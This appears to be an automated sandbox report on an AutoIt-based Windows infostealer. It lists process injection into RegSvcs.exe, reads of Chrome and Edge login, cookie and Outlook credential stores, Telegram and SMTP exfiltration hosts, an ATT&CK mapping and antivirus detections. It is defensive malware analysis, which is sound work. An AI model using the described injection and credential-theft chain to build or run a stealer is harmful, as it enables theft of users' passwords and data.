                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_01721D70 mov eax, dword ptr fs:[00000030h]0_2_01721D70
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_01721D10 mov eax, dword ptr fs:[00000030h]0_2_01721D10
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A54CE8 mov eax, dword ptr fs:[00000030h]2_2_00A54CE8
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162E918 mov eax, dword ptr fs:[00000030h]2_2_0162E918
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162FF68 mov eax, dword ptr fs:[00000030h]2_2_0162FF68
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_0162FFC8 mov eax, dword ptr fs:[00000030h]2_2_0162FFC8
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174CF50 mov eax, dword ptr fs:[00000030h]6_2_0174CF50
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174CFB0 mov eax, dword ptr fs:[00000030h]6_2_0174CFB0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174B900 mov eax, dword ptr fs:[00000030h]6_2_0174B900
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0053083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0053083F
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005309D5 SetUnhandledExceptionFilter,0_2_005309D5
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00530C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00530C21
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A62622
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A5083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A5083F
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A509D5 SetUnhandledExceptionFilter,2_2_00A509D5
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A50C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A50C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11EE008
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 102C008
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00571201
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00552BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00552BA5
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0057B226 SendInput,keybd_event,0_2_0057B226
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_005922DA
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00571663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00571663
                  Source: ty1nyFUMlo.exe, enterogenous.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ty1nyFUMlo.exe, enterogenous.exe | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00530698 cpuid 0_2_00530698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00588195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00588195
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0056D27A GetUserNameW,0_2_0056D27A
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0054B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0054B952
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: enterogenous.exe | Binary or memory string: WIN_81
                  Source: enterogenous.exe | Binary or memory string: WIN_XP
                  Source: enterogenous.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: enterogenous.exe | Binary or memory string: WIN_XPe
                  Source: enterogenous.exe | Binary or memory string: WIN_VISTA
                  Source: enterogenous.exe | Binary or memory string: WIN_7
                  Source: enterogenous.exe | Binary or memory string: WIN_8
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7824, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00591204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00591204
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00591806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00591806
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00AB1204
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00AB1806
                  ATT&CK matrix (one column per tactic; a leading number is the signature count badge shown next to that technique):
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 1 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 127 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 1 Masquerading | LSA Secrets | 321 Security Software Discovery | SSH | 3 Clipboard Data | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 111 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Behavior Graph ID: 1588893 | Sample: ty1nyFUMlo.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100
                  Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
                  Contacted hosts: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains
                  Process tree:
                  ty1nyFUMlo.exe (4) started
                      dropped: C:\Users\user\AppData\...\enterogenous.exe, PE32
                      signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection
                      enterogenous.exe (2) started
                          dropped: C:\Users\user\AppData\...\enterogenous.vbs, data
                          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 4 other signatures
                          RegSvcs.exe (15 2) started
                              network: mail.acadental.com 3.130.71.34, ports 49904, 50009, 587, AMAZON-02US, United States; api.telegram.org 149.154.167.220, ports 443, 49853, 49969, TELEGRAMRU, United Kingdom; 2 other IPs or domains
                  wscript.exe (1) started
                      signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      enterogenous.exe (1) started
                          signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                          RegSvcs.exe (2) started
                              signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                  Source | Detection | Scanner | Label
                  ty1nyFUMlo.exe | 62% | Virustotal |
                  ty1nyFUMlo.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
                  ty1nyFUMlo.exe | 100% | Avira | HEUR/AGEN.1319493
                  ty1nyFUMlo.exe | 100% | Joe Sandbox ML |
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe | 100% | Avira | HEUR/AGEN.1319493
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\translucently\enterogenous.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
                  No Antivirus matches
                  No Antivirus matches
